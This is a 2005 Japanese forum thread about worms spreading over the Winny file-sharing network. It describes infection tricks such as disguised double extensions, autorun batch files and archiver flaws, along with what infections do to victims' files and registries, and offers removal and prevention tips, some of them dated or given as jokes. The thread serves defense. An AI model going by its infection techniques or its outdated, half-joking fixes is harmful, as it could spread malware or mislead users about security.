Winnyを狙ったワーム・ニュイルス情報 Part34
『旧型お断り』
Winnyで流れている"新種の"ワーム、ウイルス等を報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
■流行種
・元祖Antinny系 ・キンタマ系 ・batファイル ・スクリーンセーバー etc
■主な流行感染パターン
・exeの前にスペースたくさん(例:「秘密の写真.jpg .exe」)
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・解凍ソフトの脆弱性を利用し、スタートアップに解凍させて再起動後exeを実行させる
■ダウンロード後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルは安易に実行しない
・ファイルのアイコンが偽装されてないか確認する
■全ての感染者に共通の、確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、退避するなり諦めるなりしてください。
前スレ
Winnyを狙ったワーム・ウイルス情報 Part33
http://tmp4.2ch.net/test/read.cgi/download/1107015489/ テンプレまとめ
http://www.geocities.jp/kemkzuenc/Antinny.html Antinny対策サイト
ttp://nyweb.hp.infoseek.co.jp/
■質問テンプレ 質問の際、あなたのPC環境やウイルスソフトがわからないと対処できません。 テンプレに沿って答えることで解答が出やすくなります。 【使用OS】 【WindowsUpdateしてるか】 【使用AntiVirusソフト】 【AntiVirusをUpdateしてるか】 【ウイルススキャンの結果】 【オンラインスキャンしたなら結果】 【Winnyのバージョン】 【Winny歴、総DL量】 【テンプレを読んだか】 【テンプレにある対策を実行したか】 【症状、具体的に分かる限りすべて書く】 【何をしたらそんなことになったのか】 【これまでにとった措置】
■推奨無視リスト このままIgnore.txtにコピペしてください。 .exe,,0,0,,0,1,0 .jpg,,0.0085,0.0088,,0,1,0 .jpg .lzh,,0,0,,0,1,0 .g .lzh,,0,0,,0,1,0 .avi .lzh,,0,0,,0,1,0 .m .lzh,,0,0,,0,1,0 .w .lzh,,0,0,,0,1,0 .txt .lzh,,0,0,,0,1,0 .rar .lzh,,0,0,,0,1,0 .cab .lzh,,0,0,,0,1,0 .exe .lzh,,0,0,,0,1,0 ※無視リストを追加しすぎるとマシンに負荷が掛かります。
■感染しないための注意1 〜予めやっておくべき設定〜
・アンチウイルスソフトのインストール及び常駐、定期的な更新。
・うっかり操作防止のため、エクスプローラの操作はダブルクリック。
・ファイルの拡張子は表示させておく。できれば詳細表示を使うか、ファイラを使う。
・nyをProgramFilesに置かない。CacheとDownフォルダは詳細表示にする。
・CD/DVDドライブのAutorunは切っておく。(詳しくは別記)
・適切な無視リストの設定などで、ウイルスを呼び込まない。
・whiter対策としてC:\Windows\Systemに「Whismng.exe」というフォルダを作成。
また怪しいと思ったらwhiterVBS簡易チェッカーで調べてみる。
ttp://mxtrojan.at.infoseek.co.jp/column02.html ・IEのセキュリティ設定を厳しくする。特にActiveXコントロールとプラグインを無効orダイアログ
表示に。
(拡張子.folderで悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり)
ttp://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html ・XMLのOBJECT要素によってコマンドを起動するバグ対策に、
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
にあるFlagsの値を10進数で1に変更する。
・アイコン偽装したexeを見分けるため、
フォルダ・txt・aviなど偽装されやすい拡張子は標準アイコンから変更しておく。
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス
権を制限する。
※アプリケーションのインストール時に弊害が起こることもあるので注意。
終了〜じゃ〜
■感染しないための注意2 〜普段からの注意〜
・大事なデータはこまめにバックアップを取る。
・落としたファイルは必ずウイルススキャンする。
・指定外の場所へ解凍される脆弱性がある解凍ソフトがあるので対応済のソフトを使う。
ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html ・解凍ソフトはWinRARなど、解凍前に中身を確認できるアーカイバを使う。
・CDイメージはAutorunを切ってからマウントし、更に実行ファイル(setup.exe等)をウイルススキャンする。
・exeファイルの実行は完全自己責任、転んでも泣かない。
・怪しい・危険なファイルはWinnyFileDatabaseでチェックする。
ttp://winny.serveftp.com/nydb/top.php ※CD/DVDドライブのAutorunの切り方
◆Win9x、Meの場合
1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャ]-[CD-ROM]-[プロパティ]-[設定]を開く
2.オプション項目の「挿入の自動通知」のチェックを外す
◆Win2000、XPの場合
1.[スタート]−[ファイル名を指定して実行]で「regedit」と入力
2.レジストリエディタで、HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
3.右の「AutoRun」値のデータを0に設定
※設定変更後、必ず再起動すること。再起動しないと有効になりません。
※窓の手などの管理ソフトでも簡単にオフに出来ます。
※DaemonToolsの自動起動とは別です。これをオフにしても自動実行は切れません。
★流行種その1
【キンタマ(W32.AntiWinny.K等)】
■感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏んで感染。
・IEや拡張子「.folder」のバグを利用し、自動実行させ感染。
■主な症状(感染確認方法)
・Upfolder.txtに登録したことのないフォルダが登録される。
・レジストリエディタ(regedit.exe)を開こうとするとメモ帳が開く。
・"C:\Documents and Settings\ユーザー名\Local Settings\Temp"に"ユーザー名.txt"が作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に名前xxx データC:\Program Files\???\???.exe(???は任意の名前)が登録される。
・スタートアップに該当プログラムが登録される。(msconfigで確認)
■主な活動内容
・Winnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取る。
・デスクトップ上のファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh という名前でupフォルダに置く。
・UpFolder.txtを書き換えてファイルを勝手にアップロードする。
・Winnyを接続すると知らない間に勝手にこれらをダウンロードする。
・各exeファイルはそのアイコンの本来の動作も同時に行う。
(例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示されるため気づきにくい)
■駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れ直す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。
・C:\Program Files\???\???.exeを削除、 スタートアップからも該当プログラム削除。
■予防
・なるべく関わらない。推奨無視ワード「キンタマ」「デスクトップ」
■まとめサイト
ttp://myui.s53.xrea.com/kin/index.html ■挙動の似たウイルス【苺きんたま(Trojan.Upchan)】
ttp://www.geocities.jp/ichigo_kintama/
ニュイルス乙
★流行種その2 【Antinny.ms(仮称)】 Antinny.Bの亜種? サイズ 1.26MB 開発名 SilentToker Delphi製 ファイルバージョン5.1.3125.1093 製品バージョン6.00.1800.1007 ■主な症状(感染確認方法) ・Windowsフォルダにsvchost.exeを作成。(無い場合もあり) ※Systemフォルダにあるsvchost.exeは問題ありません。 ・UpFolder.txtにBBSという名前でダウンフォルダを追加。 ・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。感染の際にアイコンを自ら変更する。 ・アンチウイルスソフト(ノートン、バスター)の常駐を無効にする。 ・親と子があり、いずれもSystemフォルダに作成される。子を消しても、再起動すると親が子を再度作成する。 親はms???.exe(282k)、子はms???.exe(248k)。 ・親はサービスに登録される。 ・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可にする。 ・親と子はノートンでトロイとして検出される。バスターは未対応? ■活動内容 ・毎月第一月曜日に発動。行動内容は不明。 ■駆除方法 1.親のファイル名が含まれるレジストリキーを削除。 Win2k、XPの場合HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。 (Win9x、MEの場合は不明) 2.セーフモードで再起動し、ファイルを親子ともども削除。 3.HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。 HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。 4.NyのUpフォルダ設定を元に戻す。 5.ノートンやバスター等のワクチンソフトを再インストール。 バスターはPCCTool.exeを使えば再インストールせずに済む。
10 :
手伝う :05/02/20 22:29:50 ID:XsnDfPFA0
★流行種その3 【Autorun+batを利用したウイルス】 5種類以上の亜種がある。 ■感染ルート ・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。 ・Setup.batやSetup.exeを実行させることで感染。 ■主な活動内容(種類により活動は異なる) ・deltree、del、rmコマンドでファイル削除。 ・bug.exeで気をそらす。 ・reg deleteコマンドでレジストリ全削除。 ・スタートアップに自身を登録し、再起動する毎に活動する。 ・レジストリのRunやRunOnceに自身を登録し、再起動する毎に活動する。 ・システムの復元の無効化。 ・Windowsファイル保護の無効化。 ・使用者名・企業名変更。 ・レジストリエディタ本体及びdllcacheやi386フォルダ内のバックアップの削除。 (削除したファイルと同名のフォルダを作成する) ・強制再起動 ・html(ACCS・JASRACへの田代砲)の起動をatコマンドでスケジュールする。 ・壁紙をエロCGに変更(画面のプロパティでの修正は不可)。 ■駆除方法(種類により対処法は異なる) ・batファイルに書かれたDOSコマンドを読んで、加えられた変更を元に戻す。 ■対策 ・batファイルを不用意に実行しない。
★流行種その4 【スクリーンセーバー(仮称)】 ・サイズは4,553,632Byte、アイコンはフォルダに偽装。 ■感染ルート ・感染者が流す圧縮ファイルにある偽装されたウイルス本体から感染する模様。 ■主な症状(感染確認方法) ・ny起動すると画面が真っ黒になり、 赤い文字で「winnyで違法なファイルを集めています」と文字が流れる。 ・マウス動かすとログオフ画面に切り替わる。 ・起動時にアドレス帳が勝手に立ち上がる。 ・タスクマネージャが起動できない。 ■主な活動内容 ・C:\WINNT\Web\Wallpaperのフォルダを開く。(意味は不明) ・C:\WINDOWS\bugfixというフォルダを作り2つの圧縮ファイル作成。 [任意ワード][NullPorce] 俺のアドレス帳&お気に入り ユーザー名.zip 私はユーザー名、Antinnyの作者だ。.zip ・UpFolder.txtに「Path=C:\WINDOWS\bugfix」を追加。 ・Winny.exeが置いてあるフォルダに、"NullPorce2MX.exe"(22,528バイト)ができる。 ・C:\WINNTにWindowsXPのフォルダに偽装したexeファイルをいくつか(3つ?)作る。 ファイル名はシステムに使用されるものをランダムに使用する模様。 (報告済み:CTFMON.EXE、Exploder.exe、IMEJPMlG8.0.exeなど、どれも45,056バイト) ・レジストリに以下を追加し、起動時の自動実行が設定される。 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ・また以下の値も追加、作用は不明?値はGalaxian Explosion HKEY_CURRENT_USER\Software\VB and VBA Program Settings\NullPorce2\Attribute ■駆除方法 ・C:\WINDOWS\system\にあるwnconfig.txtとアイコンが偽装しているexeを削除。 ・C:\WINDOWS\bugfix\の中に生成されてる2つのファイルを削除。 ・nyを入れてるフォルダにあるUpFolder.txtを削除。 ・レジストリで追加されたキーを削除。
★流行種その5 【仙台キンタマ(W32.SillyP2P)】 ■感染ルート ・主にエロゲのイメージファイルをマウント、Autorunでウイルス発動。 ■主な活動内容 ・壁紙を勝手に変更する。 ・windows\system32の中にexeを作製(svchost32.exe、setup.exe、ごみ箱.exeなど)。 ・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに上記exeを追加。 ・レジストリエディタをメモ帳で上書き。 ・UpFolder.txtにUPフォルダを追加し、 Download.txtにウイルスと思われるスペースつきのexeファイルを追加する。 ・winnyのフォルダ内に隠しフォルダでUPフォルダが作られ、 downフォルダ内のファイル一覧のtxt、デスクトップSS、 Favorites、受信トレイ.dbx、送信トレイ.dbx、My Documentsが入れられる。 ・Ignore.txtに仙台ギャラクシーエンジェルズを追加するため、自分が晒されてると気づきにくい。 ■駆除方法 ・windows\system32の中に作製されたexeを削除。 ・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに追加されたキー削除。 ・UpFolder.txt、Download.txtの問題箇所修正削除。 【仙台スクリーンセーバー】 ・仙台キンタマの2次感染を狙ったもの、仙台キンタマが放流する詰合わせに偽装。 ・『(ユーザー名が2-3文字の女性名、トリップ無し)に混在の.scr』とスクリーンセーバ偽装。 ・ハードディスク内の.doc、.xls、.txt、.jpgなどを収集しnyへ放流する。 ・ノートンはAntinny.Gとして緊急対策。
ニュイルスきたー おつー
15 :
ラスト :05/02/20 22:33:14 ID:XsnDfPFA0
オツ
にゅいにゅい、おつ
乙 でも ニャーム・ニュイルス なら更に良かったw
ウイルスがかわいらしく感じるな 鳴き声がニュイニュイ。
ワラタ>ニュイルス
本当にニュイルスで建てやがってwwwおつ
『まず、ここは初心者の質問・救済スレではありません。』 『まず、ここは初心者の質問・救済スレではありません。』 『まず、ここは初心者の質問・救済スレではありません。』
24 :
[名無し]さん(bin+cue).rar :05/02/20 23:34:45 ID:vzk0vLui0
_,,. -ー-- ..、
,.::'-- 、-- ★. ヽ、
, -''/;' r:::, lー-、, =、 ヽ , - 、
/ /~ヽ`"_ノ ;' γヽ }ヽ l / )
>>1 l !  ̄ 、 `ー'' ノ l lノ!_.ノrっ-、 < 乙です
ヽ ! `'''''"ヽ l l Lブ├'~
`(ヽ `i入_, .l/ l '__.ノ
〉 ト、 し' ,.. - 、_,.ノ~ /‐'~
/ ノ-''"`/ r''/ー―'"
`'''" l ノ‐'
`"
新しい2ch語誕生の予感 ニュイルス
ニャーム・ニュイルスっつー単語自体はこのスレで随分前に出たんだけどな。
その頃スレタイに入れようって話もあったんだが、結局立ち消えになってた。
実際に入れて見せた
>>1 は神
注意書きが『旧型お断り』に変わっちゃってるけどな
いわゆるゴット
ゴット級なのマダァ?
しばし待て。
みつおぬるぽに感染してから数日たったけどなんにもないな 遅効性ウィルスなのか 遅効性ウィルスと見せかけて実は単なるデスクトップ変える程度のウィルスの亜種だったのか 引き続き様子を見るぽ
「二択」のリソースは BMP壁紙:まだ懲りないの?.bmp アイコン:Winrarのもの ニセUNLHA32.DLL機能は搭載してない
みつをぬるぽに時限発動するウィルスが仕掛けられてると思うかえ?
どうでしょう。
スロット覚えたてで、初めてコインをカウンターに 流そうとしたとき、場所がわからずパチンコのシマに きてしまった。で、パチンコのカウンターにコインを 流してしまった・・・ その後、店員がピンセットみたいなもので1枚づつコインを カウンターから取り除いていたが、 「おまえわざとか?」とかイヤミを言われた。 オレはぜんぜん悪くないのに、イヤミを言われてアタッマきた。
余裕ぶっこいてんの、ウィルス作者だろ
37 :
[名無し]さん(bin+cue).rar :05/02/21 16:14:09 ID:GpAZYg3H0
【使用OS】WindowsXP 【WindowsUpdateしてるか】していません 【使用AntiVirusソフト】ウィルスバスター2005 【AntiVirusをUpdateしてるか】していません 【ウイルススキャンの結果】わかりません 【オンラインスキャンしたなら結果】 【Winnyのバージョン】v2,0 b7.1 【Winny歴、総DL量】3ヶ月くらいです。 【テンプレを読んだか】読みました 【テンプレにある対策を実行したか】どの対策をとればいいのかわかりません 【症状、具体的に分かる限りすべて書く】キャッシュがパソコンを再起動すると勝手に消えています。 それと、今まではほとんどでなかったUPフォルダがでてきます。中身は、DLしたものの名前がつくものです。 【何をしたらそんなことになったのか】わかりません 【これまでにとった措置】何もしていません どうすれば直りますか? ご指導よろしくお願いします
>>35 そうだな。お前の頭が悪いだけだもんな。
>>37 テンプレ読んで理解できないなら、初期化と新規インストールしか
ないよ。
キャッシュ消される件は対策も何もないな 患者からの提供情報が全然足りない
そんな釣りで俺様がクマーー!! ,,_ \ r'o p。`、 \ l ,.- 、ヾ r' `ー- 、 \ l '-‐‐-' ,' ' , .;;.`l \ ', j ,i' ,, '' l \ 〉 k , ' ,ノ \ ,' ', , ' ,' \ 7 l , ' ,' \ ,' ,' , ' ,' \ ,, ,.-‐--.,,__ ,' , , ' 、 ,' ,' \r''"´ , ` '" `'、 ,' (´⌒qヽ , ' ,' ,、n_ノ , ' _r-‐- 、 l' ' 、 _, ' ., r-' _,-‐q i ,' ,.‐-、_,,ソー'´ , ; 、_γ l , ,' r‐'´g ri :: ,' '、 r_, 'l :´ `ヾ ,.' `、 r, i | : ' , ` 、 j ' , ' t、o_ tj :: ' , 、`ー--,'.: _,ノ `ー-‐'´ `ー----‐'"`ー、`____;'-、 ,-' `゛"''''''"
ジャンカジャンカジャンカジャンカジャンカジャンカジャンカジャンカジャンカジャンカジャンカジャンカジャンカジャンカーン
>>36 逆に余裕が無い奴等ってexeとかbatとか無警戒に踏むバカだろ?
.exe(笑)
ワタリがどうなるのか気になり、つい慌ててクリックした。今は反省している。
デスノのexe踏む奴はキラにやられるな。
デスノ3月いっぱいで終了らしいよ
>>48 ニュースで見たけど、単なる網にそれほど制圧効果があるのかな?
網の結び目ひとつひとつに返し付きの針を仕込むとか、瞬間接着剤
入りのカプセルを編み込んでおくくらいしないとな。
ネットランチャーってところも某雑誌を思い出させるな
>>50 接着剤は後始末が大変だと進士さんが証明してた
>>51 あれは混合時にラリッたのが原因ジャマイカ。(w
>>50 結局デスク壊しちゃったよな、はがれなくて。
taskmgr復活する方法教えてください。
未だにHDD消去に会ったことがないんですけど、それって アンチウイルスソフトで検出してくれないんですか?
俺も会ったこと無いけど、そうらしいよ
俺、会ったこと有るけど、説得したら帰っていったよ
ウィルスソフトで 警告くらい出してほしいもんだ
テンプレに掲げられてるような指名手配クラスの 古株HDD消去プログラム(Whiter)なら アンチウィルスソフトが何とかしてくれるがな
偽装解除.batはデスクトップ画像 晒したりは無い…?不安だ。
午後10時、友人O、我が家へ来る→俺のPCでゲームをしはじめるwinny2起動 午前3時 ゲーム中に女性の悲鳴→画面がだんだん血痕で埋まっていき、 ぬるぽ と文字がうすく浮かび上がってくる ぬるぽニュイルスと判断→対処→winny再インスコ ・・・('A`;) 先生によるとW32.antinnyだた キンタマか( ´,_ゝ`)ちくせう 愚痴スマン
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク
65 :
63の友人 :05/02/22 16:18:33 ID:oTAdL3Lx0
ニヤニヤ
ノートン先生がただいま孤軍奮闘中でございます 戦況: ニュ46VS1先生
ルーター外してネットしてみたけど、いまだにMS Blastに感染している奴が居るんだな
JPEG画像が見れなくなった&絵描き掲示板などに書き込み不可能 という後遺症が('A`;) まだJPEG系統が汚染されたままなのか先生。
おぉ迷える子羊よ そのような穢れた身体は捨てなさい 穢れ無き魂のみで生きるのです だからPCを窓から投げ捨てろ
すまん捨てようとしたが手がくっついて離れないんだ
71 :
[名無し]さん(bin+cue).rar :05/02/22 22:59:54 ID:sFa4IwKJ0
【使用OS】WindowsXP 【WindowsUpdateしてるか】しています 【使用AntiVirusソフト】ウィルスセキュリティ 【AntiVirusをUpdateしてるか】している 【ウイルススキャンの結果】感染なしです 【オンラインスキャンしたなら結果】 【Winnyのバージョン】v2,0 b7.1 【Winny歴、総DL量】2日、びびって消しました。 【テンプレを読んだか】読みました 【テンプレにある対策を実行したか】どの対策をとればいいのかわかりません 【症状、具体的に分かる限りすべて書く】パソコンを起動させるたびにプログラムファイル内のどこかに exeファイルが作成され、勝手に外部と連絡してしまった。 【何をしたらそんなことになったのか】 exeファイルを開いてしまった。 【これまでにとった措置】何もしていいかわかりません どうすれば直りますか? ご指導よろしくお願いします
>どの対策をとればいいのかわかりません そりゃ誰にもわからんがな まず全部試すべし
73 :
[名無し]さん(bin+cue).rar :05/02/22 23:06:21 ID:0zrjGSlp0
>71 勝手に外部と連絡してしまった。 ヤバくね?
連絡って何だろう?電話?メール?うp? つり?
糸電話だろ
飛脚だろ
>>65 が全て解決してくれるに違いない
しかしキンタマにJPEG改変なんて機能あるのか('A`;)
わからなーい_| ̄|○
79 :
71 :05/02/22 23:23:55 ID:sFa4IwKJ0
いや、ウィルスソフトが外部と連絡していますよと警告してくれたので、 ちなみにその勝手にできる実行ファイルを開いたら、なんかアニメ絵の おねえちゃんのGIF画像が開きました。
平和だねぇ
82 :
[名無し]さん(bin+cue).rar :05/02/22 23:36:50 ID:j7zvyp750
>>79 で、なんでまたそこでわけのわかんねファイル開くんだよw
もうOS再インスコしなよ、いい勉強になっただろ。
【使用OS】WindowsXP 【WindowsUpdateしてるか】しています 【使用AntiVirusソフト】ノートンアンチウィルスバスター 【AntiVirusをUpdateしてるか】している 【ウイルススキャンの結果】感染あり 【オンラインスキャンしたなら結果】 感染あり 【Winnyのバージョン】v2,0 b7.1 【Winny歴、総DL量】2週間 ALL消去 【テンプレを読んだか】読みました 【テンプレにある対策を実行したか】解る範囲ですが行いました 【症状、具体的に分かる限りすべて書く】ウィルス混入と同時に発生したパソコン内のJPEG ファイルが全て閲覧出来ないという症状が改変されない。ネットの絵描き掲示板なども描こうとしても 絵を描くパレットの左上に「閉じる」ボタンがあり、操作できない状態です 【何をしたらそんなことになったのか】友人のDLした圧縮ファイルを開封した為 【これまでにとった措置】感染元となったwinnyを完全消去 レジストリ・スタートアップの怪しいもの削除。復元も一旦機能を停止させて削除。 絵描き掲示板関連が操作できないのが痛手です・・ JPEG閲覧不可ググっても対処法が出ず。非常に困ってます しかしフォルダ上からは見れないはずのJPEGファイルが小さく4つ見えるのです フォトエディタのプログラムを改変させられたのでしょうか? どうすれば直るか自身ではわかりませんお力添えをお願いいたします。
感染ありなら、そのウイルスの名称でぐぐるくらいのことはしてる よな?
キンタマの駆除で色々実行中です。OSはmeです。nyから感染しました。 その手順にプログラムファイルの怪しいexeテキスト(フォルダー)を 削除とありますが、開こうとすると「zipが壊れて」云々のフォルダーはやはり、 擬装フォルダーなので削除でしょうか?特に「斜め」のアイコンになっている フォルダーがそうなります。
ところで全然関係ないんだけど、 我が家のウィニィがポート25を通して外部に接続しようとするんだが、 これはウィルス? バスターでは反応しないんだが。
>>88 「削除」と書いてあるのに開こうとするのか。
書き間違いか、それとも知識が不足しているのかどっちだ?
>>89 全然関係ないとか予防線張るくらいなら初めから書くなと。
ローカルの25だったら、そりゃよっぽど珍奇なOSだな、少なくともRFC違反だ。
リモートの25と本当にnyが通信しているだけなら下衆の勘ぐりってやつ。
頼む、おまいの弟子にしてくれ
>>90 なるへそ。
初歩からネットワークを勉強してみるか。
ありがとう。
総合質問のところでも書いたのですが セキュリティーの問題上nyはProglam Filesには置かないようにと 書いてありましたが理由がのってませんでした。 わかる人いたら教えて下さい! ちなみにみんなはどこに置いてますか??
Program Filesだとnyのフォルダを探されやすいからだろう。 もっとも、そんな決め打ちしてくるような手抜きなウイルスもどうかと思うけどな。 ひっかかるほうもまぁアレだが。
>>93 マルチされると答える気が失せるのは俺だけだろうか?しかもわざわざageって書かんでも・・・
>>95 ごめんなさい。次から気をつけます!
>>94 だったらどんなソフトでもまとめてProgram Filesで問題無しってことですか??
このスレ的には ”セキュリティーの問題上nyはProglam Filesには置かないように” なんつーことは言わず、 ”セキュリティーの問題上、nyは個人情報等を扱わないPC(専用PCが望ましい)で稼動させるように” だな。専用PC上ではnyはどこに置こうが好きにすりゃいいわけで
【使用OS】WindowsXP 【WindowsUpdateしてるか】しています 【使用AntiVirusソフト】ウイルスバスター 【AntiVirusをUpdateしてるか】しています 【ウイルススキャンの結果】感染なし 【オンラインスキャンしたなら結果】感染なし 【Winnyのバージョン】v2,0 b7.1 【Winny歴、総DL量】2年くらい 【テンプレを読んだか】読みました 【テンプレにある対策を実行したか】わかる範囲でしました 【症状、具体的に分かる限りすべて書く】症状はとくにありません 【これまでにとった措置】 【Winny】映画総合【マタリ】 【特撮】好物あんぱん【特撮】 【もせ】音楽情報交換スレ【アルバム】 safeny.zip をWinRARで解凍しようとするとウイルスバスターが作動してWORM_ANTINNY.Lが検出しました。 そしてそのまま解凍できずにウイルスバスターが隔離しました。 中にはTrack00.exeが入っていたようですがクリックはしていません。 またテンプレにある感染確認方法を一通り試したのですがどれもあてはまりません。 解凍しようとした時点でウイルスに感染しているのでしょうか?
100 :
99 :05/02/23 07:38:18 ID:7VZqI3M20
スレよごしてごめんなさい テンプレまとめサイトのFAQ1に思いっきりこう書いていた Q.ファイルを解凍するだけでウィルスに感染することってあるんですか? 動画/音声ファイルを再生するだけでウィルスに感染したりしますか? A.そのファイルを開くアプリにバグが無い限り、そういったことは有り得ません。
【使用OS】WindowsXP SP2 【WindowsUpdateしてるか】しています 【使用AntiVirusソフト】ですノートン 【AntiVirusをUpdateしてるか】している 【ウイルススキャンの結果】ノートン、0 【オンラインスキャンしたなら結果】 トレンドマイクロ 感染なし 【Winnyのバージョン】0 b7.1 【Winny歴、総DL量】1週間、30G 【テンプレを読んだか】よく読みました 【テンプレにある対策を実行したか】該当らしいものがどれかわからないです。 【症状、具体的に分かる限りすべて書く】おとしたファイルは全部スキャン したり、解凍後もフォルダやファイルのプロパティなどチェックして、最新の注意はしてました。 表示の設定で隠しファイルを表示にしてからか問題が起きました。 Cドバイブとか に見たことの無い透き通ったファイルやフォルダなどが、沢山でるようになりました。 【何をしたらそんなことになったのか】 exeとからのものはクリックしてないと思います。 【これまでにとった措置】 不安でふて寝。 まだウイルスによる症状らしきものはでてないとおもうんですが、 よくわかりません。お願いします。
>>101 表示の設定で隠しファイルを表示にしたから
バイブ に 透き通った が、沢山
>101 それウィルス 透明なの全部削除汁
>101 見たことの無い透き通ったファイルやフォルダ 常識で考えればそれが「隠しファイル」だということは判りそうなものだが。 てか、釣りだよな?
タスクマネージャの復活方法わかったー! 前スレで誰かが言ってたように、正常なPCから TASKMGR.EXEをコピーして上書きすればいいだけ。 元は85KBくらいのものが10KBくらいにされてた。
スタートからシャットダウンが消えてるのは 「窓の手」なんかで元に戻せる。
にゅるぽにゅいるす
112 :
666 :05/02/23 21:06:59 ID:sByWJQva0
ちーっす
exeクリックしてキンタマか!?って思ったんだが調べても痕跡がない。 感染確認一通りしてみたが… それと HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ファイル名を指定して実行でやってみたが見つからない。 なんでだろう…
>>113 The Ultimate WAROSU
>>113 もうHDを窓から投げ捨てるしかないな。
OK アンティニーGだったよ。 修復してくる。
>>112 スキャンとかで何か反応はあったか?
問題はまだあるか?
昨日初めて、キンタマ踏んだが(寝不足でボーとしていたら踏んでしまっていた) 先生がちゃんとシステム監視してくれていて、発症前に防げたよ。 アリガトウ先生。グッジョブ ∩ ( ⌒) ∩_ _ グッジョブ!! /,. ノ i .,,E) / /" / /" _n グッジョブ!! / / _、_ ,/ ノ' ( l _、 _ / / ,_ノ` )/ / _、_ グッジョブ!! \ \ ( <_,` )( / ( ,_ノ` ) n ヽ___ ̄ ̄ ノ ヽ |  ̄ \ ( E) / / \ ヽ フ / ヽ ヽ_// ウイルスソフトが必須だと(ry
119 :
118 :05/02/24 03:12:16 ID:TFROHsri0
訂正 ウイルスソフト ↓ アンチウイルス
>>118 (((( ;゚Д゚)))ガクガクブルブル
アホばっか
zip〜rarを一度WINRARとかで中身を覗いていれば 偽装フォルダとかexeに引っかかることないのにねぇ
124 :
[名無し]さん(bin+cue).rar :05/02/24 12:04:20 ID:ZF2ysfOZ0
欄検眼段 に感染した模様だが、情報が少ない。誰か対処法しらない?
ちまちま感染後対処するくらいなら、ノートン幽霊やHD革命バックアップなどで 自分環境を焼いたブータブルCDを用意して即復帰した方が早いし精神的にもGood 備えあれば憂い無し 諦めてて初期化しなはれ
126 :
[名無し]さん(bin+cue).rar :05/02/24 13:18:32 ID:ZF2ysfOZ0
Cドライブにwinny本体置いてあり、Cドライブを初期化するのも 可能ですが、他のドライブ(Dマイドキュメント等)は影響無いでしょうか? 他のドライブにもウイルス・ワームが潜んでいそうで怖いんですが。 ちなみに症状ですが、他ドライブから主に画像データをCドライブ直下に tempフォルダを作って、勝手にアップロードする模様。 なお、ノートンは無反応です。他のドライブに影響が無いなら初期化します。
俺のノートンウイルス除去してくれないんだけど 何コイツ…
>>126 確定情報が無い以上、他ドライブが安全とは言えん罠
全初期化が確実
つーか、俺ってage質厨に釣られてる?w
やっぱage房はスルーで
ニュイルスは感染者が情報提供しないで質問だけしても、 何も得るものは無いって、どうして理解できないのか
もの凄く初歩的な質問ですが、初期化するデメリットはデーターを完全に消す事でしょうが、 消すのを悔やまれる程の重要な(面倒な)モノとはナンでしょう? 全部入れ直せば済む事だと思うのですが…。
>>131 >消すのを悔やまれる程の重要な(面倒な)モノとはナンでしょう?
君にそんなものはない。躊躇なく初期化してOK。
>>123 でお前はWINRARの正規版を使っているのか?
人生を初期化したい
窪塚ダイブという手段がある。
, ,、 i! ,ノミ !i r' ミ ヽ('A`)ノノ` I can fly !! ( ) ヽヽ
ニュイルス作者がはしゃいでおります
ノートン使ってるんだが来月買い替え予定 思いので乗り換えようかとも思ってるんだが down板としてはお勧めは何?
マジレスするとノートン
【使用OS】 XP Home SP1 【WindowsUpdateしてるか】 している 【使用AntiVirusソフト】 avast! 【AntiVirusをUpdateしてるか】 している 【ウイルススキャンの結果】 感染(しかし何がそうしているのかわからず) 【テンプレを読んだか】 読んだ 【テンプレにある対策を実行したか】 どれかわからない 【症状、具体的に分かる限りすべて書く】 変なexeを間違えて起動したら時限式HDD削除と出てきました。 強制終了で事なきを得ましたが、再起動するたびに起動中画面(ようこそ)で初期化が実行されます。 ボタンを押せばキャンセルできるのですが、毎回起動する度になります。 【何をしたらそんなことになったのか】 間違えてexeファイルを起動させてしまった。 【これまでにとった措置】 avast!でスキャンして感染していたファイルを削除したが、 それだけでいいのかわからないので怖くて再起動できない
>>140 Safeモードでスタートアップ解除
たぶん
一生再起動しなければええやん
>>138 ウィルスバスター
軽くてくせになりそう
みつをぬるぽってのは結局素性わかってないんですか? 今日踏んじまいました(´・ω・`)ショボーン 静かにしてるうちに、一応バックアップとっておいたほうがいいですよね_| ̄|○
おいらもみつおぬるぽをうっかり踏んじまったョ。orz 取りあえずデータ移して再フォーマット中。 バックアップは常にしときゃならんよね。
>>143 セーフモードはわかるんですが、スタートアップ解除とは?
